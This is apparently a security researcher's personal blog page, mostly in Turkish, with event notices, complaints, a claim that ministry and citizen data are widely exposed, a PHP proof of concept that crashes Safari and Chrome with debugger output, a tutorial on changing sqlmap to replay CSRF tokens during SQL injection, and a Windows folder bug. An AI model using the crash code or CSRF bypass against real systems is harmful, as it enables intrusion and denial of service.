Featured Posts

<< >>

Etkinlik ve Konferanslar

Merhaba arkadaşlar, Şubat, Mart ve Nisan ayı içerisinde bazı sunumlara katılamadım. sağlık ve iş gibi sıkıntılarından dolayı katılamadığım konferanslar için kusura bakmayın. Mayıs ayından itibaren kaldığımız yerden tüm hızıyla sunumlara

11 Bakanlığın ve 130 milyon vatandaşın tüm bilgileri hackleniyor dur diyen yok!

Umarım bunları hesabını Cumhurbaşkanı benden değil sizden sorar…Bilgilerini yayınladığım için üzgünüm ama başka çare bırakmadılar. Bunca zaman boyunca bunları ulusal güvenliğimizi ve devletimizi kötü bir duruma sokmamak için medyadan ve

Python hakkında herşey

Merhaba arkadaşlar, Python öğrenmek isteyenlerin faydalanabileceği güzel bir kaynak. Türkçe olması yeni başlayanlar için en büyük avantaj. http://www.pythondersleri.com/

Garanti Bankası Rezil Hizmetinin Ses Kayıt’ı

Garanti Bankası Rezil Hizmeti.Resmen Vodafone ve Avea Kullanmayın dedi.       burada müşteri temsilcisinin göz ardı ettiği şey, suçlunun veya sorunun kimden kaynaklı olduğunun araştırılması ve giderilmesi konusunda çözüm

Mac OS X , iOS Chrome & Safari web browsers heap corruption bug

I think heap verify mechanism of Safari prevents the actual crash. PoC 1 –> http://ibrahimbalic.com/ios2/ PoC 2 –> http://ibrahimbalic.com/nets/ PHP code: <?php ob_start(“ob_gzhandler”); $ax = str_repeat(“aa/aa/./a”,2000000); ?> <html> <head> </head>

Etkinlik ve Konferanslar

Merhaba arkadaşlar,

Şubat, Mart ve Nisan ayı içerisinde bazı sunumlara katılamadım. sağlık ve iş gibi sıkıntılarından dolayı katılamadığım konferanslar için kusura bakmayın. Mayıs ayından itibaren kaldığımız yerden tüm hızıyla sunumlara devam edeceğim.

4 Mayıs 2015, Kocaeli Üniversitesi – Kocaeli

6 Mayıs 2015, Osmangazi Üniversitesi – Eskişehir

8 Mayıs 2015, Turgut Özal Üniversitesi – Ankara

13 Mayıs 2015, Namık Kemal Üniversitesi – Çorlu

15 Mayıs 2015, İzmir Gediz Üniversitesi – İzmir

Neden Siber Silahlar” başlıklı sunumumu gerçekleştireceğim.

 

Konferans ve Etkinlik ile ilgili talep ve davetler için ibrahimbalic@hotmail.com adresine e-mail atabilirsiniz arkadaşlar.

 

İyi çalışmalar

İbrahim

11 Bakanlığın ve 130 milyon vatandaşın tüm bilgileri hackleniyor dur diyen yok!

Umarım bunları hesabını Cumhurbaşkanı benden değil sizden sorar…Bilgilerini yayınladığım için üzgünüm ama başka çare bırakmadılar.

Bunca zaman boyunca bunları ulusal güvenliğimizi ve devletimizi kötü bir duruma sokmamak için medyadan ve herkesten uzak bir şekilde halletmeye çalıştım fakat şimdi bunların çözülebilmesi adına herşeyi göze alarak medya ve halk desteği bekliyorum.Birileri güvenilerek bir yerlere getirilmiş fakat bu insanların bir çoğu teknik olarak yetersiz bir diğer kısmıda kasıtlı olarak devletimize zarar vermektedir. Lütfen duyarlı olun arkadaşlar bu bilgilere sadece ben değil bu işleri yapan her 10 kişiden 6’sı ulaşabilir. Güvenin bana Uluslarası örgüt ve Dış Devletleri hiç saymıyorum bile şu durumdaki alt yapılarımız ile bizimle gülerek eğleniyorlar…

O makamlara ve yetkilere insanları halk getirdiyse, bilgimizi koruması gereken bu insanlardan hesapta soralım arkadaşlar. Özet olarak 11 bakanlığa ait binlerce dosya, ve 130 milyon vatandaşa ait tüm kimlik bilgileri (1830’lara kadar), sağlık bilgisi, vergi borçları, ssk bilgileri, adres bilgileri, kamudaki personel bilgileri, hava kalitesi scada sistemi, cep telefonları, email adresleri, öğrenci bilgileri herkese açık bir şekilde insanların hacklemesini bekliyor… biz para bile alamadan danışmanlık veriyoruz yinede düzeltiremiyoruz! Yine bizim sözümüzü dinlemeyen o insanlar kendi yakınlarına iş paslayarak yetersiz seviyedeki insanlara iş yaptırıyorlar. Yani kısaca herkesin anlayacağı şekilde inşaat yapılacak pastacı çağırıyorlar ve pastacı bina dikiyor…

Yaklaşık olarak 1 buçuk yıldır sürdürdüğüm güvenlik araştırmaları sonucunda hemen hemen tüm bakanlıklar ile iletişime geçmiş olmamıza rağmen, bu güvenlik açıklarını kapatmaya veya çözüm üretmeye yönelik olarak hiç bir şekilde sonuç alamadım. Başta Başbakanlık olmak üzere sırasıyla MİT, NVİ, Cumhurbaşkanlığı, MEB, BDDK, Savunma Sanayi Müşteşarlığı, Ulaştırma Bakanlığı, Gümrük Bakanlığı, Adalet bakanlığı gibi bir çok kurum içerisinde bilgi teknolojilerinden sorumlu en üst düzey insanlar ile toplantılar gerçekleştirdik… hatta bu insanların dışında neydüğü belirsiz bir çok insan, yok bakanın kuzeni, yok müsteşarın baldızı gibi türev insanlar etrafımızda biti verdi… birde onlar tarafından güzelce bir kandırıldık, boşa zaman harcadık… neyse ilgili konuları 1 yıldan fazladır herkese anlatıp anlatıp durduk. Hemen hemen görüştüğümüz herkes niyet olarak iyiydi fakat bilgi seviyesi olarak yetersiz kaldılar… çözüme yönelik olarak hiç biri sorumluluk üstlenemedi..Bir çoğunun sıkıntısı bilgisizlik ve bahaneside bürokrasi oldu… 1 buçuk yıldan fazladır çözüm üretemedik.

Genel olarak olaylara baktığımda her kurum için bilgi teknolojilerine deli gibi para harçanmaktadır.Devlet son 5 yıldır bu alanda deli gibi bütçeler ayırıyor, avrupa ve amerika ile uyum sağlamaya çalışıyor fakat bu harcanan paraların sadece %30 ‘u ile çözüm üretilebilieneceken, onca para boşa harcanıyor… harcanmasına rağmen yinede bilgi ve seviye olarak yetersiz olan bu insanlar yüzünden yada kasıtlı olarak çıkarları adına bu vahşete sebep oluyorlar.

Harcanan bu paraların çoğuna bakıldığında cihaz bazlı güvenlik sağlamaya çalışılıyorlar.. Yok firewall aldık yok fireeye aldık yok checkpoint aldık diye öbürleniyorlar. Artık bu adamları kim nasıl kandırdıysa bu cihazlar ile kendilerini koruyabileceklerine inandırılmışlar cünkü bu insanlar bu konularda bilgisizler güvendikleri adamlara inanarak iş yapıyorlar yada çıkar sağladıkları firmalara inanmış numarası yapıyorlar. Burada tüm dünya siber casusluktan ve birçok firmanın NSA yani amerika ulusal güvenlik ajansı ile iş birliği içinde olduğunu söylerken bizim bu yetki ve makam sahibi abilerimiz bu insanların cihazlarını bizim en mahrem yerlerimize sokarak güvende olduklarını sanıyorlar…

satın alınan o cihazlar neredeyse hepsi  yurtdışı kaynaklı teknoloji firmalarına aittir.. Bu gibi cihazları Türkiye’de sadece satan firmalar var en iyi bildiğiniz güvenlik firması bile bu alanda bir arge yaparak cihaz üretmemiştir. sadece bunlar üzerinden para kazanmaktadır ve bu vahşete göz yummaktalar.

Bazı yerlerde ise ilgili firmalar ile üst düzey yöneticiler arasında bağ olduğunuda geçen bu zaman içerisinde öğrenmiş olduk. Ayrıca bu firmaların çoğununda bilgi Güvenliği ile alakaları olmadığını sadece ticaret yapabilecek kapasitede olduğunu ayrıca belirtmek istiyorum.

Neyse şimdi biliyorum belkide bu kurum ve insanları bu yazdıklarım çok rahatsız edecek belkide hukuki sıkıntılarda yaşayacağım belkide ticari olarakta beni sıkıntıya sokacaklar ama artık inceldiği yerden kopsun diyorum ben bu vahşete seyirci kalamayacağım…

Kanıt olarak eklediğim belgeleri kaldırdım.

Python hakkında herşey

Merhaba arkadaşlar,

Python öğrenmek isteyenlerin faydalanabileceği güzel bir kaynak. Türkçe olması yeni başlayanlar için en büyük avantaj.

http://www.pythondersleri.com/

Garanti Bankası Rezil Hizmetinin Ses Kayıt’ı

Garanti Bankası Rezil Hizmeti.Resmen Vodafone ve Avea Kullanmayın dedi.

 

 

 

burada müşteri temsilcisinin göz ardı ettiği şey, suçlunun veya sorunun kimden kaynaklı olduğunun araştırılması ve giderilmesi konusunda çözüm üretici merci olarak benim Garanti bankasını müşteri temsilcisinin ise beni görüyor olmasıdır. Sorunun çözülüp hizmete dönüştürülmesi konusunda muhattabım garanti bankasıdır. Fakat ilgili yetkili kendisini haklı olduğuna o kadar inandırmış ki sanarsın mağdur olan garanti ve sebebi benim allah’ta benim belamı versin… Neyse hatalıysam email atın ( :

Mac OS X , iOS Chrome & Safari web browsers heap corruption bug

I think heap verify mechanism of Safari prevents the actual crash.

PoC 1 –> http://ibrahimbalic.com/ios2/

PoC 2 –> http://ibrahimbalic.com/nets/

PHP code:

<?php
ob_start(“ob_gzhandler”);
$ax = str_repeat(“aa/aa/./a”,2000000);
?>
<html>
<head>
</head>
<body>
<a http://<?php echo $ax;?>” id=”test”>test</a>
</body>
</html>

 

 

Crash:

Expected Results:
0:000:x86> .frame /r
00 0042e294 60b8cdfc CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90
eax=00000000 ebx=06fb2d90 ecx=00000061 edx=00000000 esi=4bc90020 edi=0ab60c40
eip=60b982d7 esp=0042e284 ebp=0042e294 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90:
60b982d7 66890c42 mov word ptr [edx+eax*2],cx ds:002b:00000000=????
0:000:x86> ub .
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x73:
60b982ba c3 ret
60b982bb 33c0 xor eax,eax
60b982bd 3944240c cmp dword ptr [esp+0Ch],eax
60b982c1 7e1f jle CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x9b (60b982e2)
60b982c3 8b4c2404 mov ecx,dword ptr [esp+4]
60b982c7 0fb60c08 movzx ecx,byte ptr [eax+ecx]
60b982cb 668b0c4dc898c260 mov cx,word ptr CoreFoundation!_CFDefaultEightBitStringEncoding+0x1a8 (60c298c8)[ecx*2]
60b982d3 8b542408 mov edx,dword ptr [esp+8]

 

Sqlmap ile CSRF Bypass

Merhabalar,

 

Birçok güvenlik araştırmacısı penetrasyon testleri yaparken, zafiyet tespit edebilmek için veya tespit ettikleri zafiyetleri exploit edebilmek adına çeşitli araçlardan faydalanmaktadır. Bu araçlar genel olarak işlemleri otomatik hale getiriyor olsalar da kısmen yetersiz kaldıkları durumlar veya güvenlik denetimlerine takıldıkları zamanlar vardır. Bu başlık altında SQLMap aracını kullanarak CSRF(Cross-site Request Forgery) için alınmış bir dizi önlemi bypass etmenin yollarına deyineceğim.

ttttaaa

 

Burada kullanılan CSRF mekanizmasının çalışma anatomisine göz atacak olursak, Server’ın, Client için gönderdiği cevapta (response) sayfa içerisindeki formlar için random bir token oluşturulmuş. Server Client’tan gelecek olan her istek için bu token değerini beklemektedir. Eğer bu token gönderilirse, Istek(request) için Cevap(response) verilecektir. Sayfa her yenilendiğinde (her request için) o sayfaya özel uniq bir token oluşturulmakta ve yapılacak istek için bu token beklenmektedir.

 

SQLMap aracının bu seneryo/mekanizma içerisinde kullanacağımızı düşünürsek, yapılacak atack’ın başarısız olacağını hemen anlayabiliriz.SQLMap’ın bu seneryo içerisinde server için yapacağı her istek içerisinde server için bir token göndermesi gerekmektedir. Bu tip bir durum için SQLMap içerisinde yapılacak ufak bir kaç değişiklik ile SQLMap için bu yetenek kazandırılabilinir.

Hedefimiz SQLMap aracığını çalışma mekanizmasını değiştirmek suretiyle yapacağı her istek(request) öncesinde Server’dan ilgili token değerini alıp, yapacağı bir sonraki istek(request) içerisinde bu token’ı kullanması. Bu sebeple bulmamız gereken öncelikli şey SQLMap aracının istek yapmış olduğu modül.

https://github.com/sqlmapproject/sqlmap/blob/master/lib/request/connect.py

SQLMap aracı biraz incelediğimizde yapılan her istek için connect.py içerisinde bulunan getPage functionını kullandığını açıkça görebilmekteyiz. Seneryomuza göre yapılacak her işlem için SQLMap aracının server ile iletişim sağlaması ise bu function içerisinde değişiklik yapmamız bizim için yeterli olacaktır.

Seneryomuza göre şimdiki hedefimiz server’ın client için oluşturduğu token’ı sayfa içerisinde tespit etmek. Bunu anlamak için giden trafiği veya sayfa içerisinde source code’un incelenmesi faydalı olacaktır.

Bizim örneğimizde __RequestVerificationToken değeri içerisinde gidip geldiğini görüyoruz.

 

fffkret

Server’ın client için oluşturduğu random token’ın tutulduğu input değerini tespit ettik, Şimdiki hedefimiz sunucuya kendi cookie değerimiz ile istekte(request) bulunup, bize göndermiş olduğu cevap(response) içerisinde __RequestVerificationToken değerini alıp, SQLMap içerisinde gönderilecek post değeri içerisine yerleştirmek.

connectpy

 

Yukarıda görmüş olduğunuz gibi connect.py içerisinde getpage functionında değişiklikler yaptım, 1. aşama olarak server için kendi cookie değerimi set ediyorum ve 2. aşamada bu cookie değeri ile server’a istek yapıyorum(request). 2. aşamada server’ın bana göndermiş olduğu cevap(response) içerisinde aradığım __RequestVerificationToken değerini parçalıyorum(parse ediyorum). Bu değeri alıp 4 aşamada SQLMap’in post parametresinin içerisindeki csrfid değişkeni ile server’dan aldığım değişkeni yer değiştiriyorum. Bu sayede SQLMap yapacağı her istek içerisinde server’a requestverification token yollamış oluyor.
ffffa

Sqlmap içerisinde __RequestVerificationToken parametresinin değerini csrfid olarak verdiğim için her istekte alınan request token burayla yer değiştirilecektir.

Bu mantık ile farklı uygulamalarda farklı denetimleri bypass edebilirsiniz.

Herkese iyi çalışmalar dilerim

İbrahim

Baliç Bilişim Sitesi ve Eğitim İçerikleri Yenilendi.

Merhabalar,

Baliç Bilişim’in websitesi ve eğitim içerikleri yenilendi.

www.balicbilisim.com

Windows Directory Bug

Hi Guys,

I’d like to share a weird story with you.

Today, I found this interesting bug/issue in Windows OS. earlier I tested on Windows 8.1(x64), Windows 7(x64) and Windows Sever 2008 R2 (x64). I think they are present in all versions of its windows OS.

However Im not certain why this issue occured but I think it minght be related with NTFS.

Due to this issue the created folders are unable to be deleted.

mkdir “test /. /test”

windows_1

windows_2

windows_3

windows_4

if you created a file in folder, same file gets created in both folder also if any one of the folder is deleted, remaing file get corrupted.

windows_5

windows_6

Siber Güvenlik Konferansı 2014 İstanbul

https://lh6.googleusercontent.com/-rVac6pQsrRE/UoyzBYokSbI/AAAAAAAADmQ/-V5xJYnhVPQ/w140-h133-p/SGD-LOGO-RGB.jpg
Siber Güvenlik Konferansı 2014 İstanbul

Geçtiğimiz yıllarda dünyaya damgası vuran ve siber dünyadan gelebilecek tehditlere karşı önemini daha çok hissettiren siber güvenlik, siber casus yetiştirme politikaları, siber savaşlar ve bu alana yönelik olarak ülkelerin bütçelerinden ayırdıkları hatırı sayılır oranlara ulaşan rakamlar, siber güvenlik kavramını bireysel, kurumsal ve ülke güvenliği açısından kritik öneme kavuşturmuştur. Siber Güvenlik Derneği tarafından düzenlenecek olan Siber Güvenlik Konferansı bu eksendeki soru ve sorunlara çözüm önerileri sunmayı hedeflemektedir.

http://www.siberguvenlikkonferansi.org/

 

New generation brute force attacks

Hi guys,

Soon I will be sharing a method for brute force attacks. I tested on most of the big companies(Apple, Google, Microsoft etc.) which it worked well. I tried on over 20.000+ times password on any account and there seemed to be no problem occurring.

I have reported this issues to Google and Apple so i will be sharing these information’s when I get a reply from those companies and when its fixed.(i will not report to microsoft because they gave a bad experience to me in the past..)

I believe that many other company’s system has the same issue which must be fixed soon as possible.

For now I only have a response from google, i will publish it when i hear from apple.
googlePermissions